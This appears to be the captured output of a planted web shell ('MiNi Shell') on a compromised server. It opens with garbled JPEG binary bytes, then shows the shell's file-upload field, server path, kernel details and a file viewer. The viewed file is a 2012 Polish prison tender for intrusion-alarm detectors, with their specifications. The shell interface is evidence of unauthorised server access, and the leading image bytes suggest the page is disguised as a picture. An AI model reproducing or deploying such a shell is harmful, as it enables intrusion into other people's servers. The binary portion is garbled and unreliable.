JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20121001/372570-N-2012.html

<p class="kh_header"><b>Gdańsk: Przetarg nieograniczony nr 1/INF/2012 na dostawę elementów do systemu sygnalizacji włamania i napadu</b><br>
<b>Numer ogłoszenia: 372570 - 2012; data zamieszczenia: 01.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Areszt Śledczy , ul. Kurkowa 12, 80-803 Gdańsk, woj. pomorskie, tel. 058 3231000, 3231260, faks 058 3025125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zp.sw.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony nr 1/INF/2012 na dostawę elementów do systemu sygnalizacji włamania i napadu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy elementów do systemu sygnalizacji włamania i napadu
Nazwa i kod według Wspólnego Słownika Zamówień (CPV):     
- system alarmowy CPV 35121700-5

Szczegółowy opis przedmiotu zamówienia: 

1.Czujka typu I. szt 30
LP
Parametr/typ
Wartość
1
Rodzaj
Zewnętrzna
2
Metoda detekcji
Pasywna podczerwień
3
Ilość elementów detekcji
Nie mniej niż 2
4
Zasięg PIR
Nie mniej niż 23m
5
Charakterystyka detekcji
kurtyna
6
Wykrywanie prędkości ruchu
Co najmniej 0,3- 1,5m/s
7
Zdolna do pracy przy zasilaniu 
10-18VDC
8
Wyjście alarmowe typu 
N.C. 
9
Styk sabotażowy
tak
10
Dioda sygnalizacyjna
tak
11
Temperatura pracy
-20°C do +60°C
12
Szczelność obudowy
Co najmniej IP55
13
Regulacja zasięgu
tak
14
Cyfrowy antymasking
tak
15
Logika AND
tak
16
Kompensacja temperatury
tak
17
Regulacja czułości
tak
18
Filtr światła białego
tak
19
Uchwyt do montażu na ścianie
tak
20
Wysokość montażu
2,6 - 3,0 m 
21
Gwarancja
Co najmniej 3 lata

2.Czujka typu II szt 9
LP
Parametr/typ
Wartość
1
Rodzaj
Zewnętrzna
2
Metoda detekcji
PIR + MW
3
Ilość elementów detekcji
Nie mniej niż 2
4
Zasięg
Nie mniej niż 10m
5
Charakterystyka detekcji
Szerokokątna co najmniej 80°
6
Wykrywanie prędkości ruchu
Co najmniej 0,3- 1,5m/s
7
Zdolna do pracy przy zasilaniu 
10-18VDC
8
Wyjście alarmowe typu 
N.C. 
9
Styk sabotażowy
tak
10
Dioda sygnalizacyjna
tak
11
Temperatura pracy
-20°C do +60°C
12
Szczelność obudowy
Co najmniej IP55
13
Regulacja zasięgu
tak
14
Cyfrowy antymasking
tak
15
Logika AND
tak
16
Kompensacja temperatury
tak
17
Regulacja czułości
tak
18
Filtr światła białego
tak
19
Uchwyt do montażu na ścianie
tak
20
Wysokość montażu
2,6 - 3,0 m 
21
Gwarancja
Co najmniej 3 lata

3.Czujka typu III szt 5
LP
Parametr/typ
Wartość
1
Rodzaj
Zewnętrzna
2
Metoda detekcji
PIR
3
Ilość elementów detekcji
Nie mniej niż 2
4
Zasięg PIR
Nie mniej niż 10m
5
Charakterystyka detekcji
Szerokokątna co najmniej 80°
6
Wykrywanie prędkości ruchu
Co najmniej 0,3- 1,5m/s
7
Zdolna do pracy przy zasilaniu 
10-18VDC
8
Wyjście alarmowe typu 
N.C. 
9
Styk sabotażowy
tak
10
Dioda sygnalizacyjna
tak
11
Temperatura pracy
-20°C do +60°C
12
Szczelność obudowy
Co najmniej IP55
13
Regulacja zasięgu
tak
14
Cyfrowy antymasking
tak
15
Logika AND
tak
16
Kompensacja temperatury
tak
17
Regulacja czułości
tak
18
Filtr światła białego
tak
19
Uchwyt do montażu na ścianie
tak
20
Wysokość montażu
2,6 - 3,0 m 
21
Gwarancja
Co najmniej 3 lata

4.Czujka typu IV szt 4
LP
Parametr/typ
Wartość
1
Rodzaj
wewnętrzna
2
Metoda detekcji
PIR 
3
Zasięg PIR
Nie mniej niż 4m
4
Charakterystyka detekcji
Szerokokątna co najmniej 100°
5
Zdolna do pracy przy zasilaniu 
11-13VDC
6
Wyjście alarmowe typu 
N.C. 
7
Styk sabotażowy
tak
8
Dioda sygnalizacyjna
tak
9
Temperatura pracy
-20°C do +40°C
10
Szczelność obudowy
Nie mniej niż IP44
11
Regulacja zasięgu
tak
12
Uchwyt do montazu na ścianie
tak
13
Wysokość montażu
1,9 - 2,2 m 
14
Gwarancja
Co najmniej 3 lata

5.Czujka typu V szt 1
LP
Parametr/typ
Wartość
1
Rodzaj
Zewnętrzna
2
Metoda detekcji
Cyfrowa bariera mikrofalowa
3
Liczba  kanałów
Nie mniej niż 10
4
Zasięg 
Nie mniej niż 50m
5
Komunikacja
Ethernet lub RS232
6
Wykrywanie prędkości ruchu
0-15m/s
7
Zdolna do pracy przy zasilaniu 
18-20 VAC
8
Wyjście alarmowe typu 
N.C. 
9
Styk sabotażowy
tak
10
Regulacja parametrów
Zdalna oraz lokalna
11
Temperatura pracy
-20°C do +60°C
12
Szczelność obudowy
Co najmniej IP55
13
Sposób montażu 
słupek
14
Cyfrowy antymasking
tak
15
Miejsce na wbudowany akumulator
tak
16
Możliwość pracy synchronicznej pomiędzy dwoma nadajnikami
tak
17
Gwarancja
Co najmniej 3 lata
18
Słupek montażowy w komplecie
tak

6.Czujka typu VI szt 3
LP
Parametr/typ
Wartość
1
Rodzaj
Zewnętrzna
2
Metoda detekcji
Cyfrowa bariera mikrofalowa
3
Liczba  kanałów
Nie mniej niż 10
4
Zasięg 
Nie mniej niż 110m
5
Komunikacja
Ethernet lub RS232
6
Wykrywanie prędkości ruchu
0-15m/s
7
Zdolna do pracy przy zasilaniu 
18-20 VAC
8
Wyjście alarmowe typu 
N.C. 
9
Styk sabotażowy
tak
10
Regulacja parametrów
Zdalna oraz lokalna
11
Temperatura pracy
-20°C do +60°C
12
Szczelność obudowy
Co najmniej IP55
13
Sposób montażu 
słupek
14
Cyfrowy antymasking
tak
15
Miejsce na wbudowany akumulator
tak
16
Możliwość pracy synchronicznej pomiędzy dwoma nadajnikami
tak
17
Gwarancja
Co najmniej 3 lata
18
Słupek montażowy w komplecie
tak

7.Czujka typu VII szt 1
LP
Parametr/typ
Wartość
1
Rodzaj
Zewnętrzna
2
Metoda detekcji
Cyfrowa bariera mikrofalowa
3
Liczba  kanałów
Nie mniej niż 10
4
Zasięg 
Nie mniej niż 170m
5
Komunikacja
Ethernet lub RS232
6
Wykrywanie prędkości ruchu
0-15m/s
7
Zdolna do pracy przy zasilaniu 
18-20 VAC
8
Wyjście alarmowe typu 
N.C. 
9
Styk sabotażowy
tak
10
Regulacja parametrów
Zdalna oraz lokalna
11
Temperatura pracy
-20°C do +60°C
12
Szczelność obudowy
Co najmniej IP55
13
Sposób montażu 
słupek
14
Cyfrowy antymasking
tak
15
Miejsce na wbudowany akumulator
tak
16
Możliwość pracy synchronicznej pomiędzy dwoma nadajnikami
tak
17
Gwarancja
Co najmniej 3 lata
18
Słupek montażowy w komplecie
tak

8.Urządzenie/a testujące/programujące do czujek typ V, VI , VII wraz z niezbędnym oprogramowaniem zgodne z dostarczonymi barierami szt. 1

9.Dedykowany zasilacz do czujek typu V, VI i VII przystosowany do pracy w sieci jedno fazowego napięcia przemiennego o wartości. 230V i częstotliwości 50Hz szt 5.

Dostawa musi zostać zrealizowana w terminie do 28 dni od dnia podpisania umowy, istnieje możliwość sukcesyjnej dostawy.

  	Łączna wartość oferty powinna zawierać :
1. ceny jednostkowe netto zawierające koszty transportu i ubezpieczenia itp.
2. wartość brutto	

Dostawa musi zostać zrealizowana w terminie do 28 dni od dnia podpisania umowy. Dostarczane materiały muszą być fabrycznie nowe i nie mogą nosić cech używania. Dostarczany towar nie może nosić cech korozji, uszkodzenia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 35.12.17.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 28.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku bedzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/INF/2012</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku bedzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/INF/2012</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku bedzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/INF/2012</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku bedzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/INF/2012</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania tego warunku bedzie dokonana na podstawie wypełnionego oświadczenia o spełnianiu warunków stanowiącego załącznik do SIWZ nr 1/INF/2012</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 Ustawy Zamawiający dopuszcza  możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, jeżeli zmiany te są korzystne dla Zamawiającego lub konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy. Warunkiem takiej zmiany jest podpisanie aneksu do istniejącej umowy oraz udokumentowanie w/w okoliczności. Zamawiający zastrzega sobie prawo do żądania od Wykonawcy przed podpisaniem umowy lub w trakcie trwania dostawy dokumentów potwierdzających, że dostarczane materiały spełniają warunki oraz parametry techniczne określone w SIWZ nr 1/INF/2012.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Kurkowa 12; 80-803 Gdańsk, fax: (58)-302-51-25, mail: as_gdansk@sw.gov.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.10.2012 godzina 09:30, miejsce: Sekretariat AŚ Gdańsk ul. Kurkowa 12; 80-803 Gdańsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com